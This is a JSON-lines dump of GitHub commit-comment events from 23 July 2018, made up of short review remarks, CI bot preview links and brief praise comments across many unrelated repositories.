{"id":"8004776682","type":"CommitCommentEvent","actor":{"login":"PedjaHC"},"repo":{"name":"PedjaHC/TheFirstOne"},"payload":{"comment":{"id":29802245,"position":null,"line":null,"path":null,"commit_id":"697d2d085efa9f56ad183f9ee637cb20b6e73d93","created_at":"2018-07-23T15:45:48Z","updated_at":"2018-07-23T15:45:48Z","author_association":"OWNER","body":"AJ sve zajedno"}},"created_at":"2018-07-23T15:45:48Z"}
{"id":"8004777485","type":"CommitCommentEvent","actor":{"login":"shrutijalewar"},"repo":{"name":"nss-data-science-01/nss-data-science-01.github.io"},"payload":{"comment":{"id":29802247,"position":null,"line":null,"path":null,"commit_id":"57d45eee09696052d5ea037c3196b3d2be231a24","created_at":"2018-07-23T15:45:56Z","updated_at":"2018-07-23T15:45:56Z","author_association":"COLLABORATOR","body":"\"adding the footer\""}},"created_at":"2018-07-23T15:45:56Z"}
{"id":"8004777907","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29802248,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:45:59Z","updated_at":"2018-07-23T15:45:59Z","author_association":"OWNER","body":"One thing to mention is that I am currently don't use gralloc1 adaptor :D"}},"created_at":"2018-07-23T15:45:59Z"}
{"id":"8004789640","type":"CommitCommentEvent","actor":{"login":"Yharra"},"repo":{"name":"Yharra/Se-former-UX"},"payload":{"comment":{"id":29802266,"position":1,"line":1,"path":"_config.yml","commit_id":"1d2d003906d3581e3d9d031b4d2332e9d34dba9f","created_at":"2018-07-23T15:47:55Z","updated_at":"2018-07-23T15:47:55Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-23T15:47:55Z"}
{"id":"8004791503","type":"CommitCommentEvent","actor":{"login":"rhc54"},"repo":{"name":"open-mpi/ompi"},"payload":{"comment":{"id":29802270,"position":80,"line":124,"path":"opal/mca/event/external/configure.m4","commit_id":"a70ecf526773a3bc43b582f8d44e91b5def374e1","created_at":"2018-07-23T15:48:12Z","updated_at":"2018-07-23T15:48:12Z","author_association":"MEMBER","body":"@ggouaillardet Are you preparing a fix or shall I?"}},"created_at":"2018-07-23T15:48:12Z"}
{"id":"8004792816","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29802278,"position":null,"line":null,"path":null,"commit_id":"50287a55d3b07623120d938a4159d051e32d852d","created_at":"2018-07-23T15:48:25Z","updated_at":"2018-07-23T15:48:25Z","author_association":"NONE","body":"What is happening with the VLTC tests? Will those be considered? If yes this patch will probably be reverted."}},"created_at":"2018-07-23T15:48:25Z"}
{"id":"8004793545","type":"CommitCommentEvent","actor":{"login":"martin-georgiev"},"repo":{"name":"raml-org/raml-php-parser"},"payload":{"comment":{"id":29802279,"position":6,"line":66,"path":"composer.json","commit_id":"43282370e22a8e5155d88abebe55278adb5b85cb","created_at":"2018-07-23T15:48:32Z","updated_at":"2018-07-23T15:48:32Z","author_association":"COLLABORATOR","body":"Maybe I'm missing the point here but why do you need to download it?\r\n"}},"created_at":"2018-07-23T15:48:32Z"}
{"id":"8004794901","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29802281,"position":null,"line":null,"path":null,"commit_id":"630adb45f62fa5912a138d032ec68a55067a782d","created_at":"2018-07-23T15:48:46Z","updated_at":"2018-07-23T15:48:46Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-28](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-28).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-28-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-23T15:48:46Z"}
{"id":"8004795847","type":"CommitCommentEvent","actor":{"login":"Techbot121"},"repo":{"name":"Metastruct/pac3"},"payload":{"comment":{"id":29802283,"position":null,"line":null,"path":null,"commit_id":"8e5dd42c7aa7ae264e34a16c3e0e97fd30daff81","created_at":"2018-07-23T15:48:55Z","updated_at":"2018-07-23T15:48:55Z","author_association":"MEMBER","body":"just fyi I think both servers atm use the develop branch on Caps´ repo, so this does nothing."}},"created_at":"2018-07-23T15:48:55Z"}
{"id":"8004803392","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29802294,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:50:10Z","updated_at":"2018-07-23T15:50:10Z","author_association":"NONE","body":"I know. I wasn't using either\r\nThat thing is only for Exynos gralloc I guess"}},"created_at":"2018-07-23T15:50:10Z"}
{"id":"8004819260","type":"CommitCommentEvent","actor":{"login":"sofabeat"},"repo":{"name":"Privatix/dappctrl"},"payload":{"comment":{"id":29802323,"position":null,"line":null,"path":null,"commit_id":"57b62d5d15fc27405179bc50c31eb38bba4830bd","created_at":"2018-07-23T15:52:41Z","updated_at":"2018-07-23T15:52:41Z","author_association":"CONTRIBUTOR","body":"Resolves BV-391"}},"created_at":"2018-07-23T15:52:41Z"}
{"id":"8004838086","type":"CommitCommentEvent","actor":{"login":"SaliminZheroo"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802369,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:55:35Z","updated_at":"2018-07-23T15:55:35Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-23T15:55:35Z"}
{"id":"8004845485","type":"CommitCommentEvent","actor":{"login":"sunnyJy"},"repo":{"name":"sunnyJy/content-analysis-2018"},"payload":{"comment":{"id":29802381,"position":null,"line":null,"path":null,"commit_id":"c2a38a24fd0fc9fcec044d48cbd06c4cf4fd7e9e","created_at":"2018-07-23T15:56:47Z","updated_at":"2018-07-23T15:56:47Z","author_association":"OWNER","body":"The heating plots further showed that the descriptions in 2007-2014 were more similar to each other, and 2015-2016 were more similar to each other. Moreover, the descriptions generated in 2007-2014 and 2015-2016 were less similar. \r\nHere, the similarity among descriptions were measured by for divergence statistics, namely KL Divergence, Chi2 Divergence, KS Divergence, and Wasserstein Divergence."}},"created_at":"2018-07-23T15:56:47Z"}
{"id":"8004845500","type":"CommitCommentEvent","actor":{"login":"dangquocsontydo01"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802382,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:56:47Z","updated_at":"2018-07-23T15:56:47Z","author_association":"NONE","body":"Great "}},"created_at":"2018-07-23T15:56:47Z"}
{"id":"8004852249","type":"CommitCommentEvent","actor":{"login":"tvolkert"},"repo":{"name":"google/vector_math.dart"},"payload":{"comment":{"id":29802393,"position":7,"line":7,"path":"changelog.md","commit_id":"501a779f3f1fba994ca210f7231fd0b4691017fc","created_at":"2018-07-23T15:57:54Z","updated_at":"2018-07-23T15:57:54Z","author_association":"COLLABORATOR","body":"Fixed in https://github.com/google/vector_math.dart/pull/195"}},"created_at":"2018-07-23T15:57:54Z"}
{"id":"8004852600","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29802395,"position":80,"line":1917,"path":"bucket_E1/vim/manifests/plist.single.loaded","commit_id":"c99fb8e4312caf43d8e91e7958de64fb7f08957f","created_at":"2018-07-23T15:57:58Z","updated_at":"2018-07-23T15:57:58Z","author_association":"OWNER","body":"Careful!  all these \"vim81\" came from you.  They should have been \"%%VIM_VER%%.  I should caught it (fixed locally)."}},"created_at":"2018-07-23T15:57:58Z"}
{"id":"8004855577","type":"CommitCommentEvent","actor":{"login":"diBadi"},"repo":{"name":"diBadi/hello-world"},"payload":{"comment":{"id":29802401,"position":null,"line":null,"path":null,"commit_id":"708131b147ae5b9121744d095f6dcef9b2ba7cb4","created_at":"2018-07-23T15:58:27Z","updated_at":"2018-07-23T15:58:27Z","author_association":"OWNER","body":"looks okay for me"}},"created_at":"2018-07-23T15:58:27Z"}
{"id":"8004858388","type":"CommitCommentEvent","actor":{"login":"tcurdt"},"repo":{"name":"tcurdt/jdependency"},"payload":{"comment":{"id":29802405,"position":34,"line":112,"path":"src/main/java/org/vafer/jdependency/Clazzpath.java","commit_id":"c7b84c49eb050b4e967bbde0185b41a1106afffa","created_at":"2018-07-23T15:58:55Z","updated_at":"2018-07-23T15:58:55Z","author_association":"OWNER","body":"Glad! Thanks for the help, @cuzfrog "}},"created_at":"2018-07-23T15:58:55Z"}
{"id":"8004858898","type":"CommitCommentEvent","actor":{"login":"Imon180"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802407,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:58:59Z","updated_at":"2018-07-23T15:58:59Z","author_association":"NONE","body":"Cool project and good concept\n\nOn Mon, Jul 23, 2018 at 9:56 PM dangquocsontydo01 <notifications@github.com>\nwrote:\n\n> Great\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29802382>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AiLDhOauF4ql4DwSSTLmCTV0CEZRZHiDks5uJfJEgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-23T15:58:59Z"}
{"id":"8004859558","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29802408,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T15:59:07Z","updated_at":"2018-07-23T15:59:07Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-23T15:59:07Z"}
{"id":"8004864630","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29802416,"position":null,"line":null,"path":null,"commit_id":"0b19dfd3c62937f82f5bd52f57f198300a12052c","created_at":"2018-07-23T15:59:56Z","updated_at":"2018-07-23T15:59:56Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-23T15:59:56Z"}
{"id":"8004865523","type":"CommitCommentEvent","actor":{"login":"dmethvin-gov"},"repo":{"name":"usds/us-forms-system"},"payload":{"comment":{"id":29802420,"position":6,"line":13,"path":"docs/building-a-form/available-widgets.md","commit_id":"bb892ab32d3c1e52941ecdf592543dd8665772bb","created_at":"2018-07-23T16:00:05Z","updated_at":"2018-07-23T16:00:05Z","author_association":"CONTRIBUTOR","body":"Looking at this in the context of the section above, it probably needs some clarification. If there is a string mapping you just use the string. If it is a US Forms System widget you have to do the `import` dance. Would it make sense to pull the two bullet points in the previous section into this one?"}},"created_at":"2018-07-23T16:00:05Z"}
{"id":"8004866698","type":"CommitCommentEvent","actor":{"login":"acrylian"},"repo":{"name":"zenphoto/zenphoto"},"payload":{"comment":{"id":29802424,"position":null,"line":null,"path":null,"commit_id":"2c3b6c2487e3aa82d7892938d111462f239db9f7","created_at":"2018-07-23T16:00:15Z","updated_at":"2018-07-23T16:00:15Z","author_association":"MEMBER","body":"It is displays in mails sent via the contact_form even in 1.5. And this fix is as the comment tells for the contact_form.\r\n\r\nThe comment_form bug is already fix\r\nhttps://github.com/zenphoto/zenphoto/commit/169c8a159a75b294367496a7ab60d3aad6bee5a9\r\n"}},"created_at":"2018-07-23T16:00:15Z"}
{"id":"8004867889","type":"CommitCommentEvent","actor":{"login":"maruel"},"repo":{"name":"periph/extra"},"payload":{"comment":{"id":29802431,"position":null,"line":null,"path":null,"commit_id":"07d02e1fa10b4398943cace67fa23b33f5eb1c5f","created_at":"2018-07-23T16:00:25Z","updated_at":"2018-07-23T16:00:25Z","author_association":"CONTRIBUTOR","body":"gohci"}},"created_at":"2018-07-23T16:00:25Z"}
{"id":"8004868292","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29802433,"position":null,"line":null,"path":null,"commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T16:00:28Z","updated_at":"2018-07-23T16:00:28Z","author_association":"CONTRIBUTOR","body":"Cool, I was about to add this :+1: missing autoloading\r\n\r\n"}},"created_at":"2018-07-23T16:00:28Z"}
{"id":"8004870396","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29802436,"position":null,"line":null,"path":null,"commit_id":"e3f8e9966ecdc4dea9d9394e21ec24d28f4d1e7a","created_at":"2018-07-23T16:00:49Z","updated_at":"2018-07-23T16:00:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-106](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-106).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-106-next50.pantheonsite.io/)"}},"created_at":"2018-07-23T16:00:49Z"}
{"id":"8004871225","type":"CommitCommentEvent","actor":{"login":"maruel"},"repo":{"name":"periph/extra"},"payload":{"comment":{"id":29802437,"position":null,"line":null,"path":null,"commit_id":"07d02e1fa10b4398943cace67fa23b33f5eb1c5f","created_at":"2018-07-23T16:00:57Z","updated_at":"2018-07-23T16:00:57Z","author_association":"CONTRIBUTOR","body":"gohci"}},"created_at":"2018-07-23T16:00:57Z"}
{"id":"8004871785","type":"CommitCommentEvent","actor":{"login":"GamakCZ"},"repo":{"name":"AcidProxy/Acid"},"payload":{"comment":{"id":29802439,"position":44,"line":44,"path":"src/proxy/command/CommandMap.php","commit_id":"dbf79b103875cc409de9b326452e2aa43afb8a2f","created_at":"2018-07-23T16:01:02Z","updated_at":"2018-07-23T16:01:02Z","author_association":"NONE","body":"emm"}},"created_at":"2018-07-23T16:01:02Z"}
{"id":"8004871976","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29802440,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T16:01:04Z","updated_at":"2018-07-23T16:01:04Z","author_association":"CONTRIBUTOR","body":"This is bit dangerous, since it promises weak contract that can be easily broken. \r\nWhy is that desirable?\r\n\r\n"}},"created_at":"2018-07-23T16:01:04Z"}
{"id":"8004883826","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802459,"position":15,"line":1797,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:03:00Z","updated_at":"2018-07-23T16:03:00Z","author_association":"COLLABORATOR","body":"Shouldn't this be noun?"}},"created_at":"2018-07-23T16:03:00Z"}
{"id":"8004886584","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802466,"position":5,"line":1753,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:03:27Z","updated_at":"2018-07-23T16:03:27Z","author_association":"COLLABORATOR","body":"Now this is bizarre :D, do they use rosul for saint and peygamber for prophet?"}},"created_at":"2018-07-23T16:03:27Z"}
{"id":"8004888189","type":"CommitCommentEvent","actor":{"login":"cseshohag"},"repo":{"name":"OpenCodeFoundation/asset-manager"},"payload":{"comment":{"id":29802470,"position":null,"line":null,"path":null,"commit_id":"4690b8ed2ad72209f475feb24c773366b803f94b","created_at":"2018-07-23T16:03:43Z","updated_at":"2018-07-23T16:03:43Z","author_association":"MEMBER","body":"Good work"}},"created_at":"2018-07-23T16:03:43Z"}
{"id":"8004893121","type":"CommitCommentEvent","actor":{"login":"markfeathers"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29802475,"position":null,"line":null,"path":null,"commit_id":"36fa8ced6b1bd15d47902521c57ac18b96e51c6d","created_at":"2018-07-23T16:04:33Z","updated_at":"2018-07-23T16:04:33Z","author_association":"CONTRIBUTOR","body":"This doesn't happen on our boards.  You may want to contact Microchip for support on your design."}},"created_at":"2018-07-23T16:04:33Z"}
{"id":"8004895521","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802483,"position":86,"line":1868,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:04:57Z","updated_at":"2018-07-23T16:04:57Z","author_association":"COLLABORATOR","body":"Isn't this farisî?"}},"created_at":"2018-07-23T16:04:57Z"}
{"id":"8004895944","type":"CommitCommentEvent","actor":{"login":"DC-development"},"repo":{"name":"pguso/jquery-plugin-circliful"},"payload":{"comment":{"id":29802484,"position":null,"line":null,"path":null,"commit_id":"975177427ddda26b55cd13c5eecb596c6d374344","created_at":"2018-07-23T16:05:02Z","updated_at":"2018-07-23T16:05:02Z","author_association":"NONE","body":"Isn't this fixed. I see the solution implemeted I'd suggest closing this issue"}},"created_at":"2018-07-23T16:05:02Z"}
{"id":"8004897432","type":"CommitCommentEvent","actor":{"login":"surreal"},"repo":{"name":"surreal/reminder_keeper"},"payload":{"comment":{"id":29802488,"position":null,"line":null,"path":null,"commit_id":"ea3aeb0902134aaf669d050cc0fda0af99f2f27c","created_at":"2018-07-23T16:05:17Z","updated_at":"2018-07-23T16:05:17Z","author_association":"OWNER","body":"כמה שינוים קטנים"}},"created_at":"2018-07-23T16:05:17Z"}
{"id":"8004901844","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802500,"position":88,"line":1870,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:06:03Z","updated_at":"2018-07-23T16:06:03Z","author_association":"COLLABORATOR","body":"This might be nitpicking but isn't this \"kurtuluş\" in arabic? "}},"created_at":"2018-07-23T16:06:03Z"}
{"id":"8004902174","type":"CommitCommentEvent","actor":{"login":"daskreativ"},"repo":{"name":"restrictcontentpro/restrict-content-pro"},"payload":{"comment":{"id":29802503,"position":null,"line":null,"path":null,"commit_id":"a45fcf197acad4392c1457c321147791657159f6","created_at":"2018-07-23T16:06:07Z","updated_at":"2018-07-23T16:06:07Z","author_association":"NONE","body":"Sorry, my Misstake. Your code fixes my issue but it is not released yet :-)\r\ngot it turned around in my head.\r\nThanks for clarifying "}},"created_at":"2018-07-23T16:06:07Z"}
{"id":"8004902989","type":"CommitCommentEvent","actor":{"login":"carolanitz"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29802507,"position":36,"line":210,"path":"Sources/MediaCategoryViewController.swift","commit_id":"955988f4c9fc87bcfd932676bcb6dc9d764fd1b2","created_at":"2018-07-23T16:06:15Z","updated_at":"2018-07-23T16:06:15Z","author_association":"NONE","body":"This should not be handled by the MediaViewcontroller. Using the sharedinstance had so many sideeffects in the old implementation and the longterm goal is to get rid of the sharedInstance "}},"created_at":"2018-07-23T16:06:15Z"}
{"id":"8004906154","type":"CommitCommentEvent","actor":{"login":"yee6"},"repo":{"name":"zz4fap/doutorado"},"payload":{"comment":{"id":29802512,"position":null,"line":null,"path":null,"commit_id":"de4758aeba5da82e0cde6fc2cc7ac3c41f677ef8","created_at":"2018-07-23T16:06:47Z","updated_at":"2018-07-23T16:06:47Z","author_association":"NONE","body":"hello ，teacher.I have one question that: Can your algorithm for parameter estimation solve the radar imaging problem based on GTD model? I have tried it，those failed.could you tell me WHY? Thank you very much !"}},"created_at":"2018-07-23T16:06:47Z"}
{"id":"8004906977","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802514,"position":78,"line":1860,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:06:55Z","updated_at":"2018-07-23T16:06:55Z","author_association":"COLLABORATOR","body":"Can this be like inanan, mümin too?"}},"created_at":"2018-07-23T16:06:55Z"}
{"id":"8004909148","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29802517,"position":36,"line":210,"path":"Sources/MediaCategoryViewController.swift","commit_id":"955988f4c9fc87bcfd932676bcb6dc9d764fd1b2","created_at":"2018-07-23T16:07:17Z","updated_at":"2018-07-23T16:07:17Z","author_association":"OWNER","body":"VLCPlaybackController will need to be injected as a service."}},"created_at":"2018-07-23T16:07:17Z"}
{"id":"8004910827","type":"CommitCommentEvent","actor":{"login":"kczenn74"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":29802519,"position":19,"line":84,"path":"xbmc/network/TCPServer.cpp","commit_id":"441d1b41a1025ff65f338d765738f8cf72c8c626","created_at":"2018-07-23T16:07:34Z","updated_at":"2018-07-23T16:07:34Z","author_association":"NONE","body":"True"}},"created_at":"2018-07-23T16:07:34Z"}
{"id":"8004911715","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802521,"position":15,"line":1797,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:07:41Z","updated_at":"2018-07-23T16:07:41Z","author_association":"COLLABORATOR","body":"Ah I see we have it as noun too below but I don't get the adjectival use"}},"created_at":"2018-07-23T16:07:41Z"}
{"id":"8004917099","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29802529,"position":43,"line":1825,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:08:37Z","updated_at":"2018-07-23T16:08:37Z","author_association":"COLLABORATOR","body":"This kind of looks like it's missing a vowel but it's probably like this in the corpus too, so idk"}},"created_at":"2018-07-23T16:08:37Z"}
{"id":"8004928285","type":"CommitCommentEvent","actor":{"login":"GreyFoxGer"},"repo":{"name":"greven/oUF_lumen"},"payload":{"comment":{"id":29802546,"position":null,"line":null,"path":null,"commit_id":"70306c24794e6467d85afdd4ac1a9a663b768360","created_at":"2018-07-23T16:10:34Z","updated_at":"2018-07-23T16:10:34Z","author_association":"NONE","body":"Would be so cool if we can have the addon settings menu in game instead of manual config..."}},"created_at":"2018-07-23T16:10:34Z"}
{"id":"8004931898","type":"CommitCommentEvent","actor":{"login":"damianoneill"},"repo":{"name":"damianoneill/nc-hammer"},"payload":{"comment":{"id":29802549,"position":6,"line":71,"path":"cmd/analyse.go","commit_id":"5ee1e74d560a7b6d497bbba2fd2386b6acc8f65d","created_at":"2018-07-23T16:11:12Z","updated_at":"2018-07-23T16:11:12Z","author_association":"OWNER","body":"Still not right, should be \r\n\r\n\t// nolint\r\n\top, _ := cmd.Flags().GetString(\"operation\")\r\n\t// nolint\r\n\thostname, _ := cmd.Flags().GetString(\"hostname\")"}},"created_at":"2018-07-23T16:11:12Z"}
{"id":"8004939973","type":"CommitCommentEvent","actor":{"login":"Ligma"},"repo":{"name":"Ligma/Gary-D.-Schmidt-personal-collection"},"payload":{"comment":{"id":29802560,"position":1,"line":1,"path":"README.md","commit_id":"dab27579be82788dee6a6fdc8e52268c785bd7ec","created_at":"2018-07-23T16:12:38Z","updated_at":"2018-07-23T16:12:38Z","author_association":"OWNER","body":"Gary Douglas Schmidt would often refer to his personal referendum as the gateway to the glory hole. These SACRED texts would help the Canadian pupils in the battle of the Shmidt's: \"not to be confused with the large shirtless brawl that occured the Gatersdale school district\". Young Schmidt saw no true assencion for himself in life in his early days. He had his lucious eyes set on the military academy where he would become a airforce pilot. There Schmidt was told he had crippling color-blindness. Due to this unfourtunate turn of events Schmidt was forced to chose a different life... a life that would change the way the world spins."}},"created_at":"2018-07-23T16:12:38Z"}
{"id":"8004941256","type":"CommitCommentEvent","actor":{"login":"vicobarberan"},"repo":{"name":"fablabbcn/smartcitizen-kit-gases-pro-board"},"payload":{"comment":{"id":29802561,"position":null,"line":null,"path":null,"commit_id":"00309675cf2fe8b2234bb9daad8ed41488af8797","created_at":"2018-07-23T16:12:52Z","updated_at":"2018-07-23T16:12:52Z","author_association":"CONTRIBUTOR","body":"This fix #1 "}},"created_at":"2018-07-23T16:12:52Z"}
{"id":"8004941298","type":"CommitCommentEvent","actor":{"login":"chelseafc1026"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802562,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T16:12:52Z","updated_at":"2018-07-23T16:12:52Z","author_association":"NONE","body":"nice !"}},"created_at":"2018-07-23T16:12:52Z"}
{"id":"8004941310","type":"CommitCommentEvent","actor":{"login":"Vahe650"},"repo":{"name":"Vahe650/Eshop"},"payload":{"comment":{"id":29802563,"position":null,"line":null,"path":null,"commit_id":"16cc0e02f2bce1e2e14e56cdbcca47e8eae4ef75","created_at":"2018-07-23T16:12:52Z","updated_at":"2018-07-23T16:12:52Z","author_association":"OWNER","body":"j"}},"created_at":"2018-07-23T16:12:52Z"}
{"id":"8004947431","type":"CommitCommentEvent","actor":{"login":"githubworldworld"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802574,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T16:14:00Z","updated_at":"2018-07-23T16:14:00Z","author_association":"NONE","body":"lovely"}},"created_at":"2018-07-23T16:14:00Z"}
{"id":"8004948310","type":"CommitCommentEvent","actor":{"login":"Cryptoayinbest"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802575,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T16:14:09Z","updated_at":"2018-07-23T16:14:09Z","author_association":"NONE","body":"What a promising project "}},"created_at":"2018-07-23T16:14:09Z"}
{"id":"8004948668","type":"CommitCommentEvent","actor":{"login":"jterry75"},"repo":{"name":"jterry75/moby"},"payload":{"comment":{"id":29802576,"position":null,"line":null,"path":null,"commit_id":"b02fa725a9bfc92311a09d01502461120ee329ee","created_at":"2018-07-23T16:14:13Z","updated_at":"2018-07-23T16:14:13Z","author_association":"OWNER","body":"@jstarks\r\n@jhowardmsft\r\nPTAL"}},"created_at":"2018-07-23T16:14:13Z"}
{"id":"8004957609","type":"CommitCommentEvent","actor":{"login":"jstarks"},"repo":{"name":"jterry75/moby"},"payload":{"comment":{"id":29802592,"position":4,"line":3,"path":"vendor.conf","commit_id":"b02fa725a9bfc92311a09d01502461120ee329ee","created_at":"2018-07-23T16:15:48Z","updated_at":"2018-07-23T16:15:48Z","author_association":"NONE","body":"You'll probably want to make an hcsshim release for this. Not sure if you want to fork off an older release or just release master as-is."}},"created_at":"2018-07-23T16:15:48Z"}
{"id":"8004959506","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29802600,"position":null,"line":null,"path":null,"commit_id":"4f60b0aff1cbfb919eb3cfa6342f9b69b02079d5","created_at":"2018-07-23T16:16:09Z","updated_at":"2018-07-23T16:16:09Z","author_association":"COLLABORATOR","body":"<h3>[core] use IOptionProps instead of IHTMLOptionProps (#2707)</h3>\n\nPreview: <strong><a href='https://18753-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18753-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18753-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T16:16:09Z"}
{"id":"8004959510","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29802601,"position":null,"line":null,"path":null,"commit_id":"ae247ab9902e736fa5895d6260979caaa5e94ecf","created_at":"2018-07-23T16:16:09Z","updated_at":"2018-07-23T16:16:09Z","author_association":"COLLABORATOR","body":"<h3>add tagName prop to avoid label (#2708)</h3>\n\nPreview: <strong><a href='https://18754-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18754-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18754-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T16:16:09Z"}
